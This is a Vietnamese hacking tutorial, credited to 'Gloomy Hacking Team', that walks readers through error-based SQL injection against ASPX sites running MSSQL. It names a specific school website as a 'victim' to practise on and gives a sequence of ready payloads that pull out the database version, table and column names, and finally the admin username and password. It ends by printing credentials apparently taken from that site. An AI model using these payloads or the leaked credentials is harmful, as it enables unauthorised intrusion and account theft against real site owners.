TIP KHAI THÁC SITE DẠNG ASPX

------------------------------------
TUT KHAI THAC SITE DẠNG ASPX--------------------------------
Cũng giông như các dạng khác ta thêm dấu " ' " vào đuôi link hoặc vào thanh tìm kiếm của web site để biết site có lỗi hay không
----> victim cho các bạn test: thptnguyenthaibinh.edu.vn
~~~~~Làm từng bước theo tut nhé

++++Tim version: 'and 1=convert(int,(@@version))-- -


++++Tim database: 'and 1=convert(int,(db_name()))-- -


++++tim thong tin table:
'and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -         (1)


++++tim cac table khac table da tim dc o tren(1)
'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('các table t`im đc')))-- -


****tai sao phải them (((where table_name not in ))) ý nghĩa la tim các table khac ngoai cac  table da tim dc

----Tìm cho đến khi tìm đc cái table như: admin,user,....)thì dùng lại

@vd :'admin'
bay giờ tim ra admin r thi dừng lại (chưa t`im đc th`i cứ t`im ti^ếp)
----->tiếp theo ta:
++++Tìm thông tin table 'admin' vừa tìm đc

ta đang khai thác table 'admin'
nen dong lệnh sẽ thay đổi

'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin')))-- -

@ví dụ tim đc từ 'admin': là 'ID' thì:

----Ta làm tương tụ như ở trên
 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin') and column_name not(khác) in ('ID')))-- - delete từ khác đi nhé

Ta khai thác đến khi naò tìm đc :
-ở đây thì mình khai thác đc là :username và password
?:roi lam sao co user va pass
TA dùng lệnh cụ thể trong table username và password

'and 1=convert(int,(select top 1 username from admin))-- - để biết tài khoản
'and 1=convert(int,(select top 1 password from admin))-- - để biết mật khẩu

username: 'admin'
password: 'bongbi0917343846'

                                                                  %%%%%TUT VIẾT BỚI MINH TRỰC ---GLOOMY HACKING TEAM (GHT)%%%%%%
EDIT BY Jo3